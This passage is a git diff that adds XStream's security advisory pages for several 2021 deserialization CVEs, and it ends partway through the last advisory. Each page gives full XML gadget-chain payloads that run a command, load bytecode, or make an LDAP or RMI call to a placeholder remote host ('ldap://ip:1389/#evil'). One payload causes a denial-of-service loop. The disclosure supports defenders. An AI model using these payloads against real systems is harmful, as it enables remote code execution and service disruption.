+ <head>
+ <title>CVE-2021-29505</title>
+ </head>
+ <body>
+
+ <h2 id="vulnerability">Vulnerability</h2>
+
+ <p>CVE-2021-29505: XStream is vulnerable to a Remote Command Execution attack.</p>
+
+ <h2 id="affected_versions">Affected Versions</h2>
+
+ <p>All versions until and including version 1.4.16 are affected, if using the version out of the box. No user is
+ affected, who followed the recommendation to setup <a href="security.html#framework">XStream's security
+ framework</a> with a whitelist limited to the minimal required types.</p>
+
+ <h2 id="description">Description</h2>
+
+ <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
+ XStream creates therefore new instances based on these type information. An attacker can manipulate the processed
+ input stream and replace or inject objects, that result in execution of a local command on the server.</p>
+
+ <h2 id="reproduction">Steps to Reproduce</h2>
+
+ <p>Create a simple PriorityQueue and use XStream to marshal it to XML. Replace the XML with following snippet and
+ unmarshal it again with XStream:</p>
+<div class="Source XML"><pre><java.util.PriorityQueue serialization='custom'>
+ <unserializable-parents/>
+ <java.util.PriorityQueue>
+ <default>
+ <size>2</size>
+ </default>
+ <int>3</int>
+ <javax.naming.ldap.Rdn_-RdnEntry>
+ <type>12345</type>
+ <value class='com.sun.org.apache.xpath.internal.objects.XString'>
+ <m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content: <none></m__obj>
+ </value>
+ </javax.naming.ldap.Rdn_-RdnEntry>
+ <javax.naming.ldap.Rdn_-RdnEntry>
+ <type>12345</type>
+ <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
+ <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
+ <parsedMessage>true</parsedMessage>
+ <soapVersion>SOAP_11</soapVersion>
+ <bodyParts/>
+ <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
+ <attachmentsInitialized>false</attachmentsInitialized>
+ <multiPart class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
+ <soapPart/>
+ <mm>
+ <it class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
+ <aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>
+ <candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>
+ <names>
+ <string>aa</string>
+ <string>aa</string>
+ </names>
+ <ctx>
+ <environment/>
+ <registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>
+ <java.rmi.server.RemoteObject>
+ <string>UnicastRef</string>
+ <string>ip2</string>
+ <int>1099</int>
+ <long>0</long>
+ <int>0</int>
+ <short>0</short>
+ <boolean>false</boolean>
+ </java.rmi.server.RemoteObject>
+ </registry>
+ <host>ip2</host>
+ <port>1099</port>
+ </ctx>
+ </candidates>
+ </aliases>
+ </it>
+ </mm>
+ </multiPart>
+ </sm>
+ </message>
+ </value>
+ </javax.naming.ldap.Rdn_-RdnEntry>
+ </java.util.PriorityQueue>
+</java.util.PriorityQueue>
+</pre></div>
+<div class="Source Java"><pre>XStream xstream = new XStream();
+xstream.fromXML(xml);
+</pre></div>
+
+ <p>As soon as the XML gets unmarshalled, the payload gets executed and the command is executed on the host.</p>
+
+ <p>Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.</p>
+
+ <h2 id="impact">Impact</h2>
+
+ <p>The vulnerability may allow a remote attacker has sufficient rights to execute commands of the host only by
+ manipulating the processed input stream.</p>
+
+ <h2 id="workarounds">Workarounds</h2>
+
+ <p>See <a href="security.html#workaround">workarounds</a> for the different versions covering all CVEs.</p>
+
+ <h2 id="credits">Credits</h2>
+
+ <p>V3geB1rd, white hat hacker from Tencent Security Response Center found and reported the issue to XStream and provided the required information to reproduce it.</p>
+
+ </body>
+ </html>
diff --git a/xstream-distribution/src/content/CVE-2021-39139.html b/xstream-distribution/src/content/CVE-2021-39139.html
new file mode 100644
index 0000000000000000000000000000000000000000..b033d12a346a99f388013c0ce8567812b7516fa3
--- /dev/null
+++ b/xstream-distribution/src/content/CVE-2021-39139.html
@@ -0,0 +1,93 @@
+<html>
+<!--
+ Copyright (C) 2021 XStream committers.
+ All rights reserved.
+
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+
+ Created on 26. May 2021 by Joerg Schaible
+ -->
+ <head>
+ <title>CVE-2021-39139</title>
+ </head>
+ <body>
+
+ <h2 id="vulnerability">Vulnerability</h2>
+
+ <p>CVE-2021-39139: XStream is vulnerable to an Arbitrary Code Execution attack.</p>
+
+ <h2 id="affected_versions">Affected Versions</h2>
+
+ <p>All versions until and including version 1.4.17 are affected, if using the version out of the box with JDK
+ 1.7u21 or below. However, this scenario can be adjusted easily to an external Xalan that works regardless of the
+ version of the Java runtime. No user is affected, who followed the recommendation to setup
+ <a href="security.html#framework">XStream's security framework</a> with a whitelist limited to the minimal required
+ types.</p>
+
+ <h2 id="description">Description</h2>
+
+ <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
+ XStream creates therefore new instances based on these type information. An attacker can manipulate the processed
+ input stream and replace or inject objects, that result in execution of arbitrary code loaded from a remote server.</p>
+
+ <h2 id="reproduction">Steps to Reproduce</h2>
+
+ <p>Create a simple LinkedHashSet and use XStream to marshal it to XML. Replace the XML with following snippet and
+ unmarshal it again with XStream:</p>
+<div class="Source XML"><pre><linked-hash-set>
+ <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl serialization='custom'>
+ <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
+ <default>
+ <__name>Pwnr</__name>
+ <__bytecodes>
+ <byte-array>yv66vgAAADIAOQoAAwAiBwA3BwAlBwAmAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBa0gk/OR3e8+AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABNTdHViVHJhbnNsZXRQYXlsb2FkAQAMSW5uZXJDbGFzc2VzAQA1THlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5bG9hZDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAJwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAoAQAzeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNsZXRQYXlsb2FkAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAfeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cwEACDxjbGluaXQ+AQARamF2YS9sYW5nL1J1bnRpbWUHACoBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7DAAsAC0KACsALgEACGNhbGMuZXhlCAAwAQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwwAMgAzCgArADQBAA1TdGFja01hcFRhYmxlAQAeeXNvc2VyaWFsL1B3bmVyNDE2NTkyOTE1MTgwNjAwAQAgTHlzb3NlcmlhbC9Qd25lcjQxNjU5MjkxNTE4MDYwMDsAIQACAAMAAQAEAAEAGgAFAAYAAQAHAAAAAgAIAAQAAQAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0AAAAGAAEAAAAvAA4AAAAMAAEAAAAFAA8AOAAAAAEAEwAUAAIADAAAAD8AAAADAAAAAbEAAAACAA0AAAAGAAEAAAA0AA4AAAAgAAMAAAABAA8AOAAAAAAAAQAVABYAAQAAAAEAFwAYAAIAGQAAAAQAAQAaAAEAEwAbAAIADAAAAEkAAAAEAAAAAbEAAAACAA0AAAAGAAEAAAA4AA4AAAAqAAQAAAABAA8AOAAAAAAAAQAVABYAAQAAAAEAHAAdAAIAAAABAB4AHwADABkAAAAEAAEAGgAIACkACwABAAwAAAAkAAMAAgAAAA+nAAMBTLgALxIxtgA1V7EAAAABADYAAAADAAEDAAIAIAAAAAIAIQARAAAACgABAAIAIwAQAAk=</byte-array>
+ <byte-array>yv66vgAAADIAGwoAAwAVBwAXBwAYBwAZAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBXHmae48bUcYAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAANGb28BAAxJbm5lckNsYXNzZXMBACVMeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb287AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAaAQAjeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb28BABBqYXZhL2xhbmcvT2JqZWN0AQAUamF2YS9pby9TZXJpYWxpemFibGUBAB95c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAABAAEACgALAAEADAAAAC8AAQABAAAABSq3AAGxAAAAAgANAAAABgABAAAAPAAOAAAADAABAAAABQAPABIAAAACABMAAAACABQAEQAAAAoAAQACABYAEAAJ</byte-array>
+ </__bytecodes>
+ <__transletIndex>-1</__transletIndex>
+ <__indentNumber>0</__indentNumber>
+ </default>
+ </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
+ </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
+ <dynamic-proxy>
+ <interface>javax.xml.transform.Templates</interface>
+ <handler class='sun.reflect.annotation.AnnotationInvocationHandler' serialization='custom'>
+ <sun.reflect.annotation.AnnotationInvocationHandler>
+ <default>
+ <memberValues>
+ <entry>
+ <string>f5a5a608</string>
+ <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl reference='../../../../../../../com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl'/>
+ </entry>
+ </memberValues>
+ <type>javax.xml.transform.Templates</type>
+ </default>
+ </sun.reflect.annotation.AnnotationInvocationHandler>
+ </handler>
+ </dynamic-proxy>
+</linked-hash-set>
+</pre></div>
+<div class="Source Java"><pre>XStream xstream = new XStream();
+xstream.fromXML(xml);
+</pre></div>
+
+ <p>Depending on the JDK, the code from the remote server is executed as soon as the XML gets unmarshalled.</p>
+
+ <p>Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.</p>
+
+ <h2 id="impact">Impact</h2>
+
+ <p>The vulnerability may allow a remote attacker to execute arbitrary code only by manipulating the processed
+ input stream.</p>
+
+ <h2 id="workarounds">Workarounds</h2>
+
+ <p>See <a href="security.html#workaround">workarounds</a> for the different versions covering all CVEs.</p>
+
+ <h2 id="credits">Credits</h2>
+
+ <p>Lai Han of nsfocus security team found and reported the issue to XStream and provided the required information to reproduce it.</p>
+
+ </body>
+ </html>
diff --git a/xstream-distribution/src/content/CVE-2021-39140.html b/xstream-distribution/src/content/CVE-2021-39140.html
new file mode 100644
index 0000000000000000000000000000000000000000..b51ade26ea5ef708f000cfb35d6a020a96ce80c7
--- /dev/null
+++ b/xstream-distribution/src/content/CVE-2021-39140.html
@@ -0,0 +1,74 @@
+<html>
+<!--
+ Copyright (C) 2021 XStream committers.
+ All rights reserved.
+
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+
+ Created on 27. May 2021 by Joerg Schaible
+ -->
+ <head>
+ <title>CVE-2021-39140</title>
+ </head>
+ <body>
+
+ <h2 id="vulnerability">Vulnerability</h2>
+
+ <p>CVE-2021-39140: XStream is vulnerable to a Denial of Service attack.</p>
+
+ <h2 id="affected_versions">Affected Versions</h2>
+
+ <p>All versions until and including version 1.4.17 are affected, if using the version out of the box. No user is
+ affected, who followed the recommendation to setup <a href="security.html#framework">XStream's security framework
+ </a> with a whitelist limited to the minimal required types.</p>
+
+ <h2 id="description">Description</h2>
+
+ <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
+ XStream creates therefore new instances based on these type information. An attacker can manipulate the processed
+ input stream and replace or inject objects, that result in an endless loop probably causing a denial of service.</p>
+
+ <h2 id="reproduction">Steps to Reproduce</h2>
+
+ <p>Create a simple TreeSet and use XStream to marshal it to XML. Replace the XML with following snippet and
+ unmarshal it again with XStream:</p>
+<div class="Source XML"><pre><linked-hash-set>
+ <sun.reflect.annotation.AnnotationInvocationHandler serialization='custom'>
+ <sun.reflect.annotation.AnnotationInvocationHandler>
+ <default>
+ <memberValues class='javax.script.SimpleBindings'>
+ <map class='javax.script.SimpleBindings' reference='..'/>
+ </memberValues>
+ <type>javax.xml.transform.Templates</type>
+ </default>
+ </sun.reflect.annotation.AnnotationInvocationHandler>
+ </sun.reflect.annotation.AnnotationInvocationHandler>
+</linked-hash-set>
+</pre></div>
+<div class="Source Java"><pre>XStream xstream = new XStream();
+xstream.fromXML(xml);
+</pre></div>
+
+ <p>As soon as the XML gets unmarshalled, the an endless loop is entered and the executing thread consumes maximum
+ CPU time and will never return.</p>
+
+ <p>Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.</p>
+
+ <h2 id="impact">Impact</h2>
+
+ <p>The vulnerability may allow a remote attacker to allocate 100% CPU time on the target system depending on CPU
+ type or parallel execution of such a payload resulting in a denial of service only by manipulating the processed
+ input stream.</p>
+
+ <h2 id="workarounds">Workarounds</h2>
+
+ <p>See <a href="security.html#workaround">workarounds</a> for the different versions covering all CVEs.</p>
+
+ <h2 id="credits">Credits</h2>
+
+ <p>Lai Han of nsfocus security team found and reported the issue to XStream and provided the required information to reproduce it.</p>
+
+ </body>
+ </html>
diff --git a/xstream-distribution/src/content/CVE-2021-39141.html b/xstream-distribution/src/content/CVE-2021-39141.html
new file mode 100644
index 0000000000000000000000000000000000000000..d531115b08c63f542ef323f7c2fdfb2f8b89e558
--- /dev/null
+++ b/xstream-distribution/src/content/CVE-2021-39141.html
@@ -0,0 +1,232 @@
+<html>
+<!--
+ Copyright (C) 2021 XStream committers.
+ All rights reserved.
+
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+
+ Created on 27. May 2021 by Joerg Schaible
+ -->
+ <head>
+ <title>CVE-2021-39141</title>
+ </head>
+ <body>
+
+ <h2 id="vulnerability">Vulnerability</h2>
+
+ <p>CVE-2021-39141: XStream is vulnerable to an Arbitrary Code Execution attack.</p>
+
+ <h2 id="affected_versions">Affected Versions</h2>
+
+ <p>All versions until and including version 1.4.17 are affected, if using the version out of the box. No user is
+ affected, who followed the recommendation to setup <a href="security.html#framework">XStream's security
+ framework</a> with a whitelist limited to the minimal required types.</p>
+
+ <h2 id="description">Description</h2>
+
+ <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
+ XStream creates therefore new instances based on these type information. An attacker can manipulate the processed
+ input stream and replace or inject objects, that result in execution of arbitrary code loaded from a remote server.</p>
+
+ <h2 id="reproduction">Steps to Reproduce</h2>
+
+ <p>Create a simple PriorityQueue and use XStream to marshal it to XML. Replace the XML with following snippet and
+ unmarshal it again with XStream:</p>
+<div class="Source XML"><pre><java.util.PriorityQueue serialization='custom'>
+ <unserializable-parents/>
+ <java.util.PriorityQueue>
+ <default>
+ <size>2</size>
+ </default>
+ <int>3</int>
+ <dynamic-proxy>
+ <interface>java.lang.Comparable</interface>
+ <handler class='com.sun.xml.internal.ws.client.sei.SEIStub'>
+ <owner/>
+ <managedObjectManagerClosed>false</managedObjectManagerClosed>
+ <databinding class='com.sun.xml.internal.ws.db.DatabindingImpl'>
+ <stubHandlers>
+ <entry>
+ <method>
+ <class>java.lang.Comparable</class>
+ <name>compareTo</name>
+ <parameter-types>
+ <class>java.lang.Object</class>
+ </parameter-types>
+ </method>
+ <com.sun.xml.internal.ws.client.sei.StubHandler>
+ <bodyBuilder class='com.sun.xml.internal.ws.client.sei.BodyBuilder$DocLit'>
+ <indices>
+ <int>0</int>
+ </indices>
+ <getters>
+ <com.sun.xml.internal.ws.client.sei.ValueGetter>PLAIN</com.sun.xml.internal.ws.client.sei.ValueGetter>
+ </getters>
+ <accessors>
+ <com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2>
+ <val_-isJAXBElement>false</val_-isJAXBElement>
+ <val_-getter class='com.sun.xml.internal.ws.spi.db.FieldGetter'>
+ <type>int</type>
+ <field>
+ <name>hash</name>
+ <clazz>java.lang.String</clazz>
+ </field>
+ </val_-getter>
+ <val_-isListType>false</val_-isListType>
+ <val_-n>
+ <namespaceURI/>
+ <localPart>hash</localPart>
+ <prefix/>
+ </val_-n>
+ <val_-setter class='com.sun.xml.internal.ws.spi.db.MethodSetter'>
+ <type>java.lang.String</type>
+ <method>
+ <class>javax.naming.InitialContext</class>
+ <name>doLookup</name>
+ <parameter-types>
+ <class>java.lang.String</class>
+ </parameter-types>
+ </method>
+ </val_-setter>
+ <outer-class>
+ <propertySetters>
+ <entry>
+ <string>serialPersistentFields</string>
+ <com.sun.xml.internal.ws.spi.db.FieldSetter>
+ <type>[Ljava.io.ObjectStreamField;</type>
+ <field>
+ <name>serialPersistentFields</name>
+ <clazz>java.lang.String</clazz>
+ </field>
+ </com.sun.xml.internal.ws.spi.db.FieldSetter>
+ </entry>
+ <entry>
+ <string>CASE_INSENSITIVE_ORDER</string>
+ <com.sun.xml.internal.ws.spi.db.FieldSetter>
+ <type>java.util.Comparator</type>
+ <field>
+ <name>CASE_INSENSITIVE_ORDER</name>
+ <clazz>java.lang.String</clazz>
+ </field>
+ </com.sun.xml.internal.ws.spi.db.FieldSetter>
+ </entry>
+ <entry>
+ <string>serialVersionUID</string>
+ <com.sun.xml.internal.ws.spi.db.FieldSetter>
+ <type>long</type>
+ <field>
+ <name>serialVersionUID</name>
+ <clazz>java.lang.String</clazz>
+ </field>
+ </com.sun.xml.internal.ws.spi.db.FieldSetter>
+ </entry>
+ <entry>
+ <string>value</string>
+ <com.sun.xml.internal.ws.spi.db.FieldSetter>
+ <type>[C</type>
+ <field>
+ <name>value</name>
+ <clazz>java.lang.String</clazz>
+ </field>
+ </com.sun.xml.internal.ws.spi.db.FieldSetter>
+ </entry>
+ <entry>
+ <string>hash</string>
+ <com.sun.xml.internal.ws.spi.db.FieldSetter>
+ <type>int</type>
+ <field reference='../../../../../val_-getter/field'/>
+ </com.sun.xml.internal.ws.spi.db.FieldSetter>
+ </entry>
+ </propertySetters>
+ <propertyGetters>
+ <entry>
+ <string>serialPersistentFields</string>
+ <com.sun.xml.internal.ws.spi.db.FieldGetter>
+ <type>[Ljava.io.ObjectStreamField;</type>
+ <field reference='../../../../propertySetters/entry/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>
+ </com.sun.xml.internal.ws.spi.db.FieldGetter>
+ </entry>
+ <entry>
+ <string>CASE_INSENSITIVE_ORDER</string>
+ <com.sun.xml.internal.ws.spi.db.FieldGetter>
+ <type>java.util.Comparator</type>
+ <field reference='../../../../propertySetters/entry[2]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>
+ </com.sun.xml.internal.ws.spi.db.FieldGetter>
+ </entry>
+ <entry>
+ <string>serialVersionUID</string>
+ <com.sun.xml.internal.ws.spi.db.FieldGetter>
+ <type>long</type>
+ <field reference='../../../../propertySetters/entry[3]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>
+ </com.sun.xml.internal.ws.spi.db.FieldGetter>
+ </entry>
+ <entry>
+ <string>value</string>
+ <com.sun.xml.internal.ws.spi.db.FieldGetter>
+ <type>[C</type>
+ <field reference='../../../../propertySetters/entry[4]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>
+ </com.sun.xml.internal.ws.spi.db.FieldGetter>
+ </entry>
+ <entry>
+ <string>hash</string>
+ <com.sun.xml.internal.ws.spi.db.FieldGetter reference='../../../../val_-getter'/>
+ </entry>
+ </propertyGetters>
+ <elementLocalNameCollision>false</elementLocalNameCollision>
+ <contentClass>java.lang.String</contentClass>
+ <elementDeclaredTypes/>
+ </outer-class>
+ </com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2>
+ </accessors>
+ <wrapper>java.lang.Object</wrapper>
+ <bindingContext class='com.sun.xml.internal.ws.db.glassfish.JAXBRIContextWrapper'/>
+ <dynamicWrapper>false</dynamicWrapper>
+ </bodyBuilder>
+ <isOneWay>false</isOneWay>
+ </com.sun.xml.internal.ws.client.sei.StubHandler>
+ </entry>
+ </stubHandlers>
+ <clientConfig>false</clientConfig>
+ </databinding>
+ <methodHandlers>
+ <entry>
+ <method reference='../../../databinding/stubHandlers/entry/method'/>
+ <com.sun.xml.internal.ws.client.sei.SyncMethodHandler>
+ <owner reference='../../../..'/>
+ <method reference='../../../../databinding/stubHandlers/entry/method'/>
+ <isVoid>false</isVoid>
+ <isOneway>false</isOneway>
+ </com.sun.xml.internal.ws.client.sei.SyncMethodHandler>
+ </entry>
+ </methodHandlers>
+ </handler>
+ </dynamic-proxy>
+ <string>ldap://ip:1389/#evil</string>
+ </java.util.PriorityQueue>
+</java.util.PriorityQueue>
+</pre></div>
+<div class="Source Java"><pre>XStream xstream = new XStream();
+xstream.fromXML(xml);
+</pre></div>
+
+ <p>As soon as the XML gets unmarshalled, the code from the remote server is executed as soon as the XML gets unmarshalled.</p>
+
+ <p>Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.</p>
+
+ <h2 id="impact">Impact</h2>
+
+ <p>The vulnerability may allow a remote attacker to execute arbitrary code only by manipulating the processed
+ input stream.</p>
+
+ <h2 id="workarounds">Workarounds</h2>
+
+ <p>See <a href="security.html#workaround">workarounds</a> for the different versions covering all CVEs.</p>
+
+ <h2 id="credits">Credits</h2>
+
+ <p>Ceclin and YXXX from the Tencent Security Response Center found and reported the issue to XStream and provided the required information to reproduce it.</p>
+
+ </body>
+ </html>
diff --git a/xstream-distribution/src/content/CVE-2021-39144.html b/xstream-distribution/src/content/CVE-2021-39144.html
new file mode 100644
index 0000000000000000000000000000000000000000..1c7251adf8c7bb68620352fdb5b431ead6e7dc23
--- /dev/null
+++ b/xstream-distribution/src/content/CVE-2021-39144.html
@@ -0,0 +1,98 @@
+<html>
+<!--
+ Copyright (C) 2021 XStream committers.
+ All rights reserved.
+
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+
+ Created on 27. May 2021 by Joerg Schaible
+ -->
+ <head>
+ <title>CVE-2021-39144</title>
+ </head>
+ <body>
+
+ <h2 id="vulnerability">Vulnerability</h2>
+
+ <p>CVE-2021-39144: XStream is vulnerable to a Remote Command Execution attack.</p>
+
+ <h2 id="affected_versions">Affected Versions</h2>
+
+ <p>All versions until and including version 1.4.17 are affected, if using the version out of the box. No user is
+ affected, who followed the recommendation to setup <a href="security.html#framework">XStream's security
+ framework</a> with a whitelist limited to the minimal required types.</p>
+
+ <h2 id="description">Description</h2>
+
+ <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
+ XStream creates therefore new instances based on these type information. An attacker can manipulate the processed
+ input stream and replace or inject objects, that result in execution of a local command on the server.</p>
+
+ <h2 id="reproduction">Steps to Reproduce</h2>
+
+ <p>Create a simple PriorityQueue and use XStream to marshal it to XML. Replace the XML with following snippet and
+ unmarshal it again with XStream:</p>
+<div class="Source XML"><pre><java.util.PriorityQueue serialization='custom'>
+ <unserializable-parents/>
+ <java.util.PriorityQueue>
+ <default>
+ <size>2</size>
+ </default>
+ <int>3</int>
+ <dynamic-proxy>
+ <interface>java.lang.Comparable</interface>
+ <handler class='sun.tracing.NullProvider'>
+ <active>true</active>
+ <providerType>java.lang.Comparable</providerType>
+ <probes>
+ <entry>
+ <method>
+ <class>java.lang.Comparable</class>
+ <name>compareTo</name>
+ <parameter-types>
+ <class>java.lang.Object</class>
+ </parameter-types>
+ </method>
+ <sun.tracing.dtrace.DTraceProbe>
+ <proxy class='java.lang.Runtime'/>
+ <implementing__method>
+ <class>java.lang.Runtime</class>
+ <name>exec</name>
+ <parameter-types>
+ <class>java.lang.String</class>
+ </parameter-types>
+ </implementing__method>
+ </sun.tracing.dtrace.DTraceProbe>
+ </entry>
+ </probes>
+ </handler>
+ </dynamic-proxy>
+ <string>calc</string>
+ </java.util.PriorityQueue>
+</java.util.PriorityQueue>
+</pre></div>
+<div class="Source Java"><pre>XStream xstream = new XStream();
+xstream.fromXML(xml);
+</pre></div>
+
+ <p>As soon as the XML gets unmarshalled, the payload gets executed and the command is executed on the host.</p>
+
+ <p>Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.</p>
+
+ <h2 id="impact">Impact</h2>
+
+ <p>The vulnerability may allow a remote attacker to execute commands with the rights of the process owner on the
+ host only by manipulating the processed input stream.</p>
+
+ <h2 id="workarounds">Workarounds</h2>
+
+ <p>See <a href="security.html#workaround">workarounds</a> for the different versions covering all CVEs.</p>
+
+ <h2 id="credits">Credits</h2>
+
+ <p>Ceclin and YXXX from the Tencent Security Response Center found and reported the issue to XStream and provided the required information to reproduce it.</p>
+
+ </body>
+ </html>
diff --git a/xstream-distribution/src/content/CVE-2021-39145.html b/xstream-distribution/src/content/CVE-2021-39145.html
new file mode 100644
index 0000000000000000000000000000000000000000..1ba8e00ce0a982e1a3e09dfc42c8c2f6b6a60a3c
--- /dev/null
+++ b/xstream-distribution/src/content/CVE-2021-39145.html
@@ -0,0 +1,160 @@
+<html>
+<!--
+ Copyright (C) 2021 XStream committers.
+ All rights reserved.
+
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+
+ Created on 26. May 2021 by Joerg Schaible
+ -->
+ <head>
+ <title>CVE-2021-39145</title>
+ </head>
+ <body>
+
+ <h2 id="vulnerability">Vulnerability</h2>
+
+ <p>CVE-2021-39145: XStream is vulnerable to an Arbitrary Code Execution attack.</p>
+
+ <h2 id="affected_versions">Affected Versions</h2>
+
+ <p>All versions until and including version 1.4.17 are affected, if using the version out of the box. No user is
+ affected, who followed the recommendation to setup <a href="security.html#framework">XStream's security framework
+ </a> with a whitelist limited to the minimal required types.</p>
+
+ <h2 id="description">Description</h2>
+
+ <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
+ XStream creates therefore new instances based on these type information. An attacker can manipulate the processed
+ input stream and replace or inject objects, that result in execution of arbitrary code loaded from a remote server.</p>
+
+ <h2 id="reproduction">Steps to Reproduce</h2>
+
+ <p>Create a simple PriorityQueue and use XStream to marshal it to XML. Replace the XML with following snippet and
+ unmarshal it again with XStream:</p>
+<div class="Source XML"><pre><java.util.PriorityQueue serialization='custom'>
+ <unserializable-parents/>
+ <java.util.PriorityQueue>
+ <default>
+ <size>2</size>
+ </default>
+ <int>3</int>
+ <javax.naming.ldap.Rdn_-RdnEntry>
+ <type>12345</type>
+ <value class='com.sun.org.apache.xpath.internal.objects.XString'>
+ <m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content: &#x3C;none&#x3E;</m__obj>
+ </value>
+ </javax.naming.ldap.Rdn_-RdnEntry>
+ <javax.naming.ldap.Rdn_-RdnEntry>
+ <type>12345</type>
+ <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
+ <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
+ <parsedMessage>true</parsedMessage>
+ <soapVersion>SOAP_11</soapVersion>
+ <bodyParts/>
+ <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
+ <attachmentsInitialized>false</attachmentsInitialized>
+ <multiPart class='com.sun.xml.internal.messaging.saaj.packaging.mime.internet.MimePullMultipart'>
+ <soapPart/>
+ <mm>
+ <it class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
+ <aliases class='com.sun.jndi.ldap.LdapBindingEnumeration'>
+ <homeCtx>
+ <hostname>233.233.233.233</hostname>
+ <port__number>2333</port__number>
+ <clnt class='com.sun.jndi.ldap.LdapClient'/>
